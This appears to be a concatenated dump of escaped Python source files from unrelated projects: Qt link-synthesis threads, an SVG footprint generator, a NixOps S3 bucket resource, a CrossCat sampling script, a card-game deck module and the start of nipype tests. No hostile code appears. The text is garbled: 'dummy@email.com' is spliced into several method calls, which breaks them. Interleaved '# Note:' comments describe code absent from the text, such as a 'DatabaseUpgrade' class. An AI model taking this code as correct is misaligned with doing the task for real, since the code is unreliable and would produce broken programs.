expr.""""""\n return tuple(int(n.split(\'=\')[-1]) for n in links_expr.split("", ""))\n\n\nclass LinkThread(BaseThread):\n """"""Link assortment synthesis thread.""""""\n\n progress_update = Signal(int)\n result = Signal(dict)\n size_update = Signal(int)\n\n def __init__(self, nl: int, nj: int, parent: QWidget):\n super(LinkThread, self).__init__(parent)\n self.nl = nl\n self.nj = nj\n\n def run(self) -> None:\n """"""Run and return contracted link assortment.""""""\n try:\n la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop)\n except ValueError:\n self.progress_update.emit(1)\n self.result.emit({})\n self.finished.emit()\n return\n\n self.size_update.emit(len(la_list))\n assortment = {}\n for i, la in enumerate(la_list):\n if self.is_stop:\n break\n assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop)\n self.progress_update.emit(1 + i)\n self.result.emit(assortment)\n self.finished.emit()\n\n\nclass GraphThread(BaseThread):\n """"""Graphs enumeration thread.""""""\n progress_update = Signal(int)\n count_update = Signal(QTreeWidgetItem, int)\n result = Signal(list)\n\n def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget):\n super(GraphThread, self).__init__(parent)\n self.jobs = jobs\n self.degenerate = degenerate\n\n def run(self) -> None:\n """"""Run and return conventional graph.""""""\n cg_list: Dict[Sequence[int], List[Graph]] = {}\n answers = []\n for i, item in enumerate(self.jobs):\n if self.is_stop:\n break\n\n root = item.parent()\n la = assortment_eval(root.text(0))\n cla = assortment_eval(item.text(0))\n if la not in cg_list:\n cg_list[la] = contracted_graph(la, lambda: self.is_stop)\n\n answer = conventional_graph(\n cg_list[la],\n cla,\n self.degenerate,\n lambda: self.is_stop\n )\n self.count_update.emit(item, len(answer))\n answers.extend(answer)\n self.progress_update.emit(1 + i)\n\n self.result.emit(answers)\n 
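# Note: DatabaseUpgrade above replays every statement whose key is greater than the
# stored schema version and returns the new version. A self-contained sketch of the
# same idea against plain sqlite3, tracking the version with PRAGMA user_version
# instead of the Database wrapper (table names in the sample statements are
# illustrative):

import sqlite3

UPGRADES = {
    1: "UPDATE tracks SET duration=CAST(duration AS INTEGER);",
    2: "UPDATE albums SET artist_id=-2001 WHERE artist_id=-999;",
}

def do_db_upgrade(db_path):
    con = sqlite3.connect(db_path)
    version = con.execute("PRAGMA user_version").fetchone()[0]
    for v in range(version + 1, len(UPGRADES) + 1):
        con.execute(UPGRADES[v])
        con.execute("PRAGMA user_version = %d" % v)  # pragmas can't be parameterised
        con.commit()
    con.close()
    return len(UPGRADES)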
self.finished.emit()\n', '#!/usr/bin/env python3\n\nimport xml.etree.ElementTree as ET\n\ndef get_target():\n\treturn SVG()\n\nclass SVG:\n\tdef __init__(self):\n\t\tself.svg = ET.parse(\'skeleton.svg\')\n\t\tself.mmpx = 3.543307\n\n\tdef output(self, path):\n\t\tself.svg.write(path)\n\n\n\tdef add_package(self, package):\n\t\t\'\'\'\n\t\tTarget SVG only handles one drawing at a time, only last added drawing will be part of output\n\t\t\'\'\'\n\t\tself.svg = ET.parse(\'skeleton.svg\')\n\n\t\tself.package = \\\n\t\t\t{\n\t\t\t\t\'name\': package[\'name\'],\n\t\t\t\t\'pads\': [],\n\t\t\t\t\'mnt_pads\': [],\n\t\t\t\t\'holes\': [],\n\t\t\t\t\'lines\': [],\n\t\t\t\t\'circles\': [],\n\t\t\t\t\'rectangles\': [] ,\n\t\t\t\t\'texts\': []\n\t\t\t}\n\n\n\tdef output(self, fout):\n\n\t\tpackage = self.package\n\n\t\tfor pad in package[\'pads\']:\n\t\t\tself.gen_pac_pad(pad)\n\n\t\tfor mnt_pad in package[\'mnt_pads\']: # TODO, adding mnt_pads not done\n\t\t\tself.gen_pac_mnt_pad(mnt_pad)\n\n\t\tfor hole in package[\'holes\']:\n\t\t\tself.gen_pac_hole(hole)\n\n\t\tfor line in package[\'lines\']:\n\t\t\tself.gen_pac_line(line)\n\n\t\tif(0):\n\n\t\t\tfor circle in package[\'circles\']:\n\t\t\t\tself.gen_pac_circle(circle)\n\n\t\t\tfor rect in package[\'rectangles\']:\n\t\t\t\tself.gen_pac_rectangle(rect)\n\n\t\t\tfor text in package[\'texts\']:\n\t\t\t\tself.gen_pac_text(text)\n\n\t\tself.svg.write(fout)\n\n\n\tdef add_pac_pad(self, type, angle, size, pos, number):\n\n\t\tself.package[\'pads\'].append(\n\t\t\t{\n\t\t\t\t\'type\': type,\n\t\t\t\t\'angle\': angle,\n\t\t\t\t\'size\': size,\n\t\t\t\t\'pos\': pos,\n\t\t\t\t\'number\': number\n\t\t\t})\n\n\tdef add_pac_hole(self, diameter, pos):\n\n\t\tself.package[\'holes\'].append(\n\t\t\t{\n\t\t\t\t\'d\': diameter,\n\t\t\t\t\'pos\': pos\n\t\t\t})\n\n\tdef add_pac_line(self, layer, width, vertices):\n\n\t\tself.package[\'lines\'].append(\n\t\t\t{\n\t\t\t\t\'layer\': layer,\n\t\t\t\t\'width\': width,\n\t\t\t\t\'vertices\': vertices\n\t\t\t})\n\n\tdef gen_pac_pad(self, pad): # type, angle, size, pos, number\n\n\t\ttop_layer = self.svg.find(\'.//g[@id=""Top""]\')\n\n\t\t# TODO: Types and angle\n\n\t\tel = ET.SubElement(top_layer, \'rect\')\n\t\tel.set(\'style\', \'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1\')\n\t\tel.set(\'id\', \'pin_{}\'.format(pad[\'number\']))\n\t\tel.set(\'width\', \'{}\'.format(pad[\'size\'][0]*self.mmpx))\n\t\tel.set(\'height\', \'{}\'.format(pad[\'size\'][1]*self.mmpx))\n\t\tel.set(\'x\', \'{}\'.format((pad[\'pos\'][0] - pad[\'size\'][0]/2)*self.mmpx))\n\t\tel.set(\'y\', \'{}\'.format((pad[\'pos\'][1] - pad[\'size\'][1]/2)*self.mmpx))\n\n\n\tdef gen_pac_hole(self, hole):\n\n\t\ttop_layer = self.svg.find(\'.//g[@id=""Holes""]\')\n\n\t\tcircle = ET.SubElement(top_layer, \'circle\')\n\n\t\tcircle.set(\'style\', \'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""\')\n\n\t\tcircle.set(\'cx\', \'{}\'.format(hole[\'pos\'][0]*self.mmpx))\n\t\tcircle.set(\'cy\', \'{}\'.format(hole[\'pos\'][1]*self.mmpx))\n\t\tcircle.set(\'r\', \'{}\'.format(hole[\'d\']/2*self.mmpx))\n\n\n\tdef gen_pac_line(self, line):\n\n\t\tlayer = self.svg.find(dummy@email.com(line[\'layer\']))\n\n\t\tif(line[\'layer\'] == \'Courtyard\'):\n\t\t\tcolor = \'#e63a81\'\n\t\telif(line[\'layer\'] == \'Silk\'):\n\t\t\tcolor = \'#111111\'\n\t\telse:\n\t\t\tcolor = \'#000000\'\n\n\t\tel = 
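# Note: `assortment_eval` above recovers the integer assortment from a tree-item
# label by keeping whatever follows each '='. A quick usage check (the exact label
# format is inferred from the split logic, so treat it as an assumption):

assert assortment_eval('NL2=2, NL3=1') == (2, 1)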
ET.SubElement(layer, \'path\')\n\t\tel.set(\'style\', \'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none\'.format(line[\'width\'], color=color))\n\n\t\tpathdata = \'\'\n\t\tfirst = True\n\n\t\tfor (x,y) in line[\'vertices\']:\n\t\t\tif(first):\n\t\t\t\tpathdata += \'M \' + \'{},{}\'.format(x*self.mmpx,y*self.mmpx)\n\t\t\t\tfirst = False\n\t\t\telif(x == \'end\'):\n\t\t\t\tpathdata += \' z\'\n\t\t\telse:\n\t\t\t\tpathdata += \' L \' + \'{},{}\'.format(x*self.mmpx,y*self.mmpx)\n\n\t\tel.set(\'d\', pathdata)\n\n\n\tdef gen_circle(self, layer_name, diameter, pos):\n\n\t\tlayer = self.svg.find(dummy@email.com(layer_name))\n\n\t\tif(layer_name == \'Courtyard\'):\n\t\t\tcolor = \'#e63a81\'\n\t\telif(layer_name == \'Silk\'):\n\t\t\tcolor = \'#111111\'\n\t\telse:\n\t\t\tcolor = \'#000000\'\n\n\t\tcircle = ET.SubElement(layer, \'circle\')\n\t\tcircle.set(\'style\', \'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""\'.format(color=color))\n\n\t\tcircle.set(\'cx\', \'{}\'.format(pos[0]*self.mmpx))\n\t\tcircle.set(\'cy\', \'{}\'.format(pos[1]*self.mmpx))\n\t\tcircle.set(\'r\', \'{}\'.format(diameter/2*self.mmpx))\n\n\nif(__name__ == \'__main__\'):\n\n\ttarget = get_target()\n\n\ttarget.output(\'test.svg\')\n', '# -*- coding: utf-8 -*-\n\n# Automatic provisioning of AWS S3 buckets.\n\nimport time\nimport botocore\nimport boto3\nimport nixops.util\nimport nixops.resources\nimport nixops.ec2_utils\n\n\nclass S3BucketDefinition(nixops.resources.ResourceDefinition):\n """"""Definition of an S3 bucket.""""""\n\n @classmethod\n def get_type(cls):\n return ""s3-bucket""\n\n @classmethod\n def get_resource_type(cls):\n return ""s3Buckets""\n\n def __init__(self, xml, config={}):\n nixops.resources.ResourceDefinition.__init__(self, xml, config)\n self.bucket_name = xml.find(dummy@email.com(""value"")\n self.region = xml.find(dummy@email.com(""value"")\n self.access_key_id = xml.find(dummy@email.com(""value"")\n self.policy = xml.find(dummy@email.com(""value"")\n self.website_enabled = self.config[""website""][""enabled""]\n self.website_suffix = self.config[""website""][""suffix""]\n self.website_error_document = self.config[""website""][""errorDocument""]\n\n def show_type(self):\n return ""{0} [{1}]"".format(self.get_type(), self.region)\n\n\nclass S3BucketState(nixops.resources.ResourceState):\n """"""State of an S3 bucket.""""""\n\n state = nixops.util.attr_property(""state"", nixops.resources.ResourceState.MISSING, int)\n bucket_name = nixops.util.attr_property(""ec2.bucketName"", None)\n access_key_id = nixops.util.attr_property(""ec2.accessKeyId"", None)\n region = nixops.util.attr_property(""ec2.region"", None)\n\n\n @classmethod\n def get_type(cls):\n return ""s3-bucket""\n\n\n def __init__(self, depl, name, id):\n nixops.resources.ResourceState.__init__(self, depl, name, id)\n self._conn = None\n\n\n def show_type(self):\n s = super(S3BucketState, self).show_type()\n if self.region: s = ""{0} [{1}]"".format(s, self.region)\n return s\n\n\n @property\n def resource_id(self):\n return self.bucket_name\n\n def get_definition_prefix(self):\n return ""resources.s3Buckets.""\n\n def connect(self):\n if self._conn: return\n (access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id)\n self._conn = boto3.session.Session(region_name=self.region if self.region != ""US"" else 
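# Note: the SVG target above injects shapes into a pre-drawn skeleton.svg and scales
# millimetres by self.mmpx. A minimal standalone sketch that builds an SVG document
# from scratch with ElementTree, so no skeleton file is needed (sizes illustrative):

import xml.etree.ElementTree as ET

SVG_NS = 'http://www.w3.org/2000/svg'

def make_svg(path, mmpx=3.543307):
    ET.register_namespace('', SVG_NS)  # serialise without a namespace prefix
    root = ET.Element('{%s}svg' % SVG_NS, {'width': '100', 'height': '100'})
    pad = ET.SubElement(root, '{%s}rect' % SVG_NS)
    pad.set('x', str(1.0 * mmpx))          # 1 mm offset, scaled to pixels
    pad.set('y', str(1.0 * mmpx))
    pad.set('width', str(2.0 * mmpx))      # a 2 mm x 1.5 mm pad
    pad.set('height', str(1.5 * mmpx))
    pad.set('style', 'fill:#ff0000')
    ET.ElementTree(root).write(path)

make_svg('test_generated.svg')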
""us-east-1"",\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key)\n\n def create(self, defn, check, allow_reboot, allow_recreate):\n\n self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id()\n if not self.access_key_id:\n raise Exception(""please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID"")\n\n if len(defn.bucket_name) > 63:\n raise Exception(""bucket name ‘{0}’ is longer than 63 characters."".format(defn.bucket_name))\n\n self.connect()\n s3client = self._conn.client(\'s3\')\n if check or self.state != self.UP:\n\n self.log(""creating S3 bucket ‘{0}’..."".format(defn.bucket_name))\n try:\n ACL = \'private\' # ..or: public-read, public-read-write, authenticated-read\n s3loc = region_to_s3_location(defn.region)\n if s3loc == ""US"":\n s3client.create_bucket(ACL = ACL,\n Bucket = defn.bucket_name)\n else:\n s3client.create_bucket(ACL = ACL,\n Bucket = defn.bucket_name,\n CreateBucketConfiguration = {\n \'LocationConstraint\': s3loc\n })\n except botocore.exceptions.ClientError as e:\n if e.response[\'Error\'][\'Code\'] != ""BucketAlreadyOwnedByYou"": raise\n\n with self.depl._db:\n self.state = self.UP\n self.bucket_name = defn.bucket_name\n self.region = defn.region\n\n if defn.policy:\n self.log(""setting S3 bucket policy on ‘{0}’..."".format(defn.bucket_name))\n s3client.put_bucket_policy(Bucket = defn.bucket_name,\n Policy = defn.policy.strip())\n else:\n try:\n s3client.delete_bucket_policy(Bucket = defn.bucket_name)\n except botocore.exceptions.ClientError as e:\n # This seems not to happen - despite docs indicating it should:\n # [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]\n if e.response[\'ResponseMetadata\'][\'HTTPStatusCode\'] != 204: raise # (204 : Bucket didn\'t have any policy to delete)\n\n if not defn.website_enabled:\n try:\n s3client.delete_bucket_website(Bucket = defn.bucket_name)\n except botocore.exceptions.ClientError as e:\n if e.response[\'ResponseMetadata\'][\'HTTPStatusCode\'] != 204: raise\n else:\n website_config = { \'IndexDocument\': { \'Suffix\': defn.website_suffix } }\n if defn.website_error_document != """":\n website_config[\'ErrorDocument\'] = { \'Key\': defn.website_error_document}\n s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config)\n\n\n\n def destroy(self, wipe=False):\n if self.state == self.UP:\n self.connect()\n try:\n self.log(""destroying S3 bucket ‘{0}’..."".format(self.bucket_name))\n bucket = self._conn.resource(\'s3\').Bucket(self.bucket_name)\n try:\n bucket.delete()\n except botocore.exceptions.ClientError as e:\n if e.response[\'Error\'][\'Code\'] != ""BucketNotEmpty"": raise\n if not self.depl.logger.confirm(""are you sure you want to destroy S3 bucket ‘{0}’?"".format(self.bucket_name)): return False\n bucket.objects.all().delete()\n bucket.delete()\n except botocore.exceptions.ClientError as e:\n if e.response[\'Error\'][\'Code\'] != ""NoSuchBucket"": raise\n return True\n\n\ndef region_to_s3_location(region):\n # S3 location names are identical to EC2 regions, except for\n # us-east-1 and eu-west-1.\n if region == ""eu-west-1"": return ""EU""\n elif region == ""us-east-1"": return ""US""\n else: return region\n', '#\n# Copyright (c) 2010-2014, MIT Probabilistic Computing Project\n#\n# Lead Developers: Dan Lovell and Jay Baxter\n# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka\n# Research Leads: Vikash Mansinghka, Patrick Shafto\n#\n# Licensed under the Apache License, Version 2.0 
(the ""License"");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport argparse\nimport sys\nfrom collections import Counter\n#\nimport numpy\nimport pylab\npylab.ion()\npylab.show()\n#\nimport crosscat.tests.plot_utils as pu\nimport crosscat.utils.file_utils as fu\nimport crosscat.utils.sample_utils as su\nimport crosscat.utils.api_utils as au\n\n\n# parse some arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\'pkl_name\', type=str)\nparser.add_argument(\'--inf_seed\', default=0, type=int)\nparser.add_argument(\'--hostname\', default=\'127.0.0.1\', type=str)\nargs = parser.parse_args()\npkl_name = args.pkl_name\ninf_seed = args.inf_seed\nhostname = args.hostname\n\n# FIXME: getting weird error on conversion to int: too large from inside pyx\ndef get_next_seed(max_val=32767): # sys.maxint):\n return random_state.randint(max_val)\n\n# resume from saved name\nsave_dict = fu.unpickle(pkl_name)\nrandom_state = numpy.random.RandomState(inf_seed)\nM_c = save_dict[\'M_c\']\nX_L = save_dict[\'X_L\']\nX_D = save_dict[\'X_D\']\n\n# FIXME: test constraints\n# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]\nY = None\n\n# test simple_predictive_sample_observed\nviews_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)\nviews_samples = []\nfor replicating_samples_params in views_replicating_samples_params:\n this_view_samples = []\n for replicating_sample_params in replicating_samples_params:\n this_view_this_sample = su.simple_predictive_sample(\n M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)\n this_view_samples.extend(this_view_this_sample)\n views_samples.append(this_view_samples)\nfor view_idx, view_samples in enumerate(views_samples):\n data_array = numpy.array(view_samples)\n pu.plot_T(data_array)\n pylab.title(\'simple_predictive_sample observed, view %s on local\' % view_idx)\n\n# test simple_predictive_sample_observed REMOTE\n# hostname = \'ec2-23-22-208-4.compute-1.amazonaws.com\'\nURI = \'http://\' + hostname + \':8007\'\nmethod_name = \'simple_predictive_sample\'\n#\nviews_samples = []\nfor replicating_samples_params in views_replicating_samples_params:\n this_view_samples = []\n for replicating_sample_params in replicating_samples_params:\n args_dict = dict(\n M_c=save_dict[\'M_c\'],\n X_L=save_dict[\'X_L\'],\n X_D=save_dict[\'X_D\'],\n Y=replicating_sample_params[\'Y\'],\n Q=replicating_sample_params[\'Q\'],\n n=replicating_sample_params[\'n\'],\n )\n this_view_this_sample, id = au.call(\n method_name, args_dict, URI)\n print id\n this_view_samples.extend(this_view_this_sample)\n views_samples.append(this_view_samples)\nfor view_idx, view_samples in enumerate(views_samples):\n data_array = numpy.array(view_samples)\n pu.plot_T(data_array)\n pylab.title(\'simple_predictive_sample observed, view %s on remote\' % view_idx)\n\n# test simple_predictive_sample_unobserved\nobserved_Q = views_replicating_samples_params[0][0][\'Q\']\nQ = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]\nnew_row_samples = []\nnew_row_sample = su.simple_predictive_sample(\n M_c, X_L, X_D, 
Y, Q, get_next_seed, n=1000)\nnew_row_samples.extend(new_row_sample)\nnew_row_samples = numpy.array(new_row_samples)\npu.plot_T(new_row_samples)\n\n# once more with constraint\nY = [(int(1E6), 0, 100)]\nnew_row_sample = su.simple_predictive_sample(\n M_c, X_L, X_D, Y, Q, get_next_seed, n=1)\n\n# test impute\n# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)\n', '# -*- coding: utf-8 -*-\n""""""\n.. module:: deck\n :synopsis: Encapsulates the behavior of card collections\n.. moduleauthor:: Zach Mitchell dummy@email.com\n""""""\n\nfrom random import shuffle\nfrom typing import List\nfrom .cards import (\n Card,\n CardFaction,\n CardEffect,\n CardAction,\n CardTarget\n)\nfrom .cardrepo import CardRepo\nfrom .exceptions import (\n RealmsException,\n MainDeckEmpty,\n PlayerDeckEmpty,\n PlayerDeckInitSize,\n PlayerDeckInitContents,\n UUIDNotFoundError,\n HandInitError\n)\nfrom collections import Counter\nfrom typing import NamedTuple\n\nCardList = List[Card]\nEffectList = List[CardEffect]\nFactionList = List[CardFaction]\n\n\nEffectRecord = NamedTuple(\'EffectRecord\', [\n (\'target\', CardTarget),\n (\'action\', CardAction),\n (\'value\', int),\n (\'uuid\', str),\n (\'provider\', str)])\n\n\nclass PlayerDeck(object):\n """"""\n Records the state of the player\'s deck\n\n At any given point in time the player may have three piles of cards: undrawn cards, a\n hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are\n in which pile, provides an interface from which a hand of cards can be assembled, and\n shuffles the deck when necessary.\n\n Parameters\n ----------\n player_cards : List[Card]\n The list of cards from which the player\'s starting deck will be constructed\n\n Raises\n ------\n PlayerDeckInitSize\n Raised when constructing the deck with the wrong number of cards\n PlayerDeckInitContents\n Raised when constructing the deck with cards other than Vipers and Scouts\n """"""\n\n starting_size = 10\n\n def __init__(self, player_cards: CardList):\n try:\n self._validate_deck_size(player_cards)\n self._validate_deck_contents(player_cards)\n except RealmsException:\n raise\n self._undrawn: CardList = player_cards\n shuffle(self._undrawn) # shuffled in place\n self._discards: CardList = []\n\n @staticmethod\n def _validate_deck_size(cards: CardList) -> None:\n """"""Ensures that the starting deck contains the correct\n number of cards\n\n Parameters\n ----------\n cards : CardList\n The tentative starting deck\n\n Raises\n ------\n PlayerDeckInitSize\n Raised if the tentative starting deck is not the correct size\n """"""\n if len(cards) != PlayerDeck.starting_size:\n raise PlayerDeckInitSize(len(cards))\n return\n\n @staticmethod\n def _validate_deck_contents(cards) -> None:\n """"""Ensures that the tentative starting deck contains only Vipers and Scouts\n\n Parameters\n ----------\n cards : CardList\n The tentative starting deck\n\n Raises\n ------\n PlayerDeckInitContents\n Raised if the tentative starting deck contains cards other than Vipers or Scouts\n """"""\n for c in cards:\n if (c.name != \'Viper\') and (c.name != \'Scout\'):\n raise PlayerDeckInitContents(c.name)\n return\n\n def _next_card(self) -> Card:\n """"""Produces the next card from the player\'s deck\n\n Attempts to draw a card from the top of the undrawn pile. 
If\n the undrawn pile is empty, the undrawn pile is replenished from\n the discard pile and shuffled before attempting to draw a card again.\n An attempt to draw a card from the undrawn pile while both the undrawn\n pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception.\n\n Returns\n -------\n Card\n A card from the top of the undrawn pile\n\n Raises\n ------\n PlayerDeckEmpty\n Raised when attempting to draw a card while both undrawn and discard\n piles are empty\n """"""\n if len(self._undrawn) > 0:\n return self._undrawn.pop()\n elif len(self._discards) > 0:\n self._refill_undrawn()\n return self._undrawn.pop()\n else:\n raise PlayerDeckEmpty\n\n @property\n def cards_remaining(self) -> int:\n """"""The total number of cards left in the undrawn and discard piles\n\n Returns\n -------\n int\n The number of cards left to draw from\n """"""\n return len(self._undrawn) + len(self._discards)\n\n def _refill_undrawn(self) -> None:\n """"""Refills the undrawn pile with cards from the discard pile\n\n Note\n ----\n The cards in the discard pile are shuffled before being placed\n back into the undrawn pile\n """"""\n self._undrawn: CardList = self._discards\n shuffle(self._undrawn) # shuffled in place\n self._discards: CardList = []\n return\n\n def discard(self, card: Card) -> None:\n """"""Sends the card to the discard pile\n\n Parameters\n ----------\n card : Card\n The card to send to the discard pile\n """"""\n self._discards.append(card)\n return\n\n def draw(self, num=5) -> CardList:\n """"""Draws the specified number of cards from the undrawn pile\n\n Parameters\n ----------\n num : int (Optional)\n The number of cards to draw (Default is 5)\n\n Returns\n -------\n List[Card]\n The list of cards that were drawn\n\n Raises\n ------\n IndexError\n Raised if no cards are left to draw, or the number of cards requested\n is not a positive integer\n\n Note\n ----\n If there are cards remaining in the deck but there are fewer cards than\n were requested, then as many cards as possible are returned.\n """"""\n if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)):\n raise IndexError\n cards: CardList = []\n for _ in range(num):\n try:\n cards.append(self._next_card())\n except PlayerDeckEmpty:\n break\n return cards\n\n def _scrap(self, card):\n """"""\n Permanently removes a card from the discard pile\n """"""\n pass\n\n\nclass MainDeck(object):\n """"""The deck from which players can acquire cards\n\n Parameters\n ----------\n cardrepo : CardRepo\n The repository from which the cards are obtained\n """"""\n def __init__(self, cardrepo: CardRepo):\n self._repo: CardRepo = cardrepo\n self._cards: CardList = self._repo.main_deck_cards()\n shuffle(self._cards)\n return\n\n def next_card(self) -> Card:\n """"""Produces the next card from the main deck\n\n Returns\n -------\n Card\n A card from the top of the main deck\n\n Raises\n ------\n MainDeckEmpty\n Raised when attempting to draw a card when the deck is empty\n """"""\n if len(self._cards) > 0:\n return self._cards.pop()\n else:\n raise MainDeckEmpty\n\n\nclass TradeRow(object):\n """"""Presents the cards that players may acquire\n\n Parameters\n ----------\n maindeck : MainDeck\n The deck from which the trade row is drawn\n cardrepo : CardRepo\n The repository from which cards are obtained\n """"""\n def __init__(self, maindeck: MainDeck, cardrepo: CardRepo):\n self._maindeck: MainDeck = maindeck\n self._repo: CardRepo = cardrepo\n self._explorer = None\n self._cards = []\n\n @property\n def 
available(self) -> CardList:\n """"""Produces the list of all cards available for purchase\n\n Returns\n -------\n List[Card]\n The list of cards available for purchase\n """"""\n return self.cards + [self.explorer]\n\n @property\n def cards(self) -> CardList:\n """"""Produces the list of cards available for purchase\n from the main deck\n\n Returns\n -------\n List[Card]\n The list of available cards from the main deck\n """"""\n while len(self._cards) < 5:\n try:\n card: Card = self._maindeck.next_card()\n except MainDeckEmpty:\n break\n self._cards.append(card)\n return self._cards\n\n @property\n def explorer(self) -> Card:\n """"""Produces the current Explorer available for purchase\n\n Returns\n -------\n Card\n The current Explorer\n """"""\n if self._explorer is None:\n self._explorer: Card = self._repo.new_explorer()\n return self._explorer\n\n def acquire(self, uuid: str) -> Card:\n """"""Produces the card with the specified UUID\n\n Parameters\n ----------\n uuid : str\n The UUID of the card the player wishes to acquire\n\n Returns\n -------\n Card\n The card with the specified UUID\n\n Raises\n ------\n UUIDNotFoundError\n Raised when the UUID of the requested card is not found\n in the list of available cards\n """"""\n cards_bools = [c.uuid == uuid for c in self.cards]\n if True in cards_bools:\n i = cards_bools.index(True)\n return self._cards.pop(i)\n elif self.explorer.uuid == uuid:\n card = self._explorer\n self._explorer = None\n return card\n else:\n raise UUIDNotFoundError\n\n def scrap(self, uuid: str) -> None:\n """"""Permanently removes a card from the trade row\n\n Parameters\n ----------\n uuid : str\n The UUID of the card to remove\n """"""\n cards_bools = [c.uuid == uuid for c in self.cards]\n if True in cards_bools:\n i = cards_bools.index(True)\n del self._cards[i]\n elif self.explorer.uuid == uuid:\n self._explorer = None\n else:\n raise UUIDNotFoundError\n return\n\n\nclass Hand(object):\n """"""The player\'s hand of cards\n\n A Hand is made from a list of cards drawn from the undrawn pile of the player\'s deck,\n as well as any bases that were played previously and have not been destroyed.\n\n The processing of cards into a collection of effects is a multi-step process:\n\n 1. The basic effects are pulled from each card\n 2. The factions are tallied up to see which cards may activate their ally abilities\n 3. Ally abilities are pulled from each card\n 4. The effects are aggregated by their action types\n 5. Effects are applied in whatever order the user chooses\n 6. 
If cards are drawn as the result of an action, the effects list is updated\n\n Parameters\n ----------\n to_draw : int\n The number of cards to draw initially\n existing_bases : List[Card]\n Any bases that were played previously and have not yet been destroyed\n playerdeck : PlayerDeck\n The player\'s deck\n """"""\n def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck):\n if (to_draw < 0) or (to_draw > 5):\n raise HandInitError\n try:\n drawn: CardList = playerdeck.draw(to_draw)\n except IndexError:\n drawn: CardList = []\n self.cards = drawn + existing_bases\n self._playerdeck = playerdeck\n return\n\n @staticmethod\n def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]:\n """"""Assembles a list of `EffectRecord`s from the cards in the hand\n """"""\n basic_effects: List[EffectRecord] = []\n for c in cards:\n effects: List[CardEffect] = c.effects_basic\n records = [EffectRecord(target=e.target,\n action=e.action,\n value=e.value,\n uuid=e.uuid,\n provider=c.uuid)\n for e in effects]\n basic_effects += records\n return records\n\n @staticmethod\n def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]:\n """"""Assembles a list of factions that should have their ally abilities activated\n """"""\n factions: CardFaction = [c.faction for c in cards]\n if CardFaction.ALL in factions:\n return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE]\n counts = Counter(factions)\n allies: List[CardFaction] = [key for key in counts.keys()\n if counts[key] > 1 and key != CardFaction.UNALIGNED]\n return allies\n\n @staticmethod\n def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]:\n """"""Assembles a list of the ally effects that are applicable\n """"""\n ally_effects: List[EffectRecord] = []\n for c in cards:\n effects: List[CardEffect] = c.effects_ally\n records = [EffectRecord(target=e.target,\n action=e.action,\n value=e.value,\n uuid=e.uuid,\n provider=c.uuid)\n for e in effects if c.faction in facs]\n ally_effects += records\n return ally_effects\n\n def _collect_effects(self) -> List[EffectRecord]:\n """"""Assembles a list of effects provided by the player\'s hand\n """"""\n basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards)\n ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards)\n ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions)\n return basic_effects + ally_effects\n', '# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\nfrom __future__ import print_function, unicode_literals\nfrom future import standard_library\nstandard_library.install_aliases()\n\nfrom builtins import open, str, bytes\nimport os\nimport tempfile\nimport shutil\nimport warnings\nimport simplejson as json\n\nfrom nipype.testing import (assert_equal, assert_not_equal, assert_raises,\n assert_true, assert_false, with_setup, package_check,\n skipif, example_data)\nimport nipype.interfaces.base as nib\nfrom nipype.utils.filemanip import split_filename\nfrom nipype.interfaces.base import Undefined, config\nfrom traits.testing.nose_tools import skip\nimport traits.api as traits\n\n\ndef test_bunch():\n b = nib.Bunch()\n yield assert_equal, b.__dict__, {}\n b = nib.Bunch(a=1, b=[2, 3])\n yield assert_equal, b.__dict__, {\'a\': 1, \'b\': [2, 3]}\n\n\ndef test_bunch_attribute():\n b = nib.Bunch(a=1, b=[2, 3], c=None)\n yield assert_equal, 
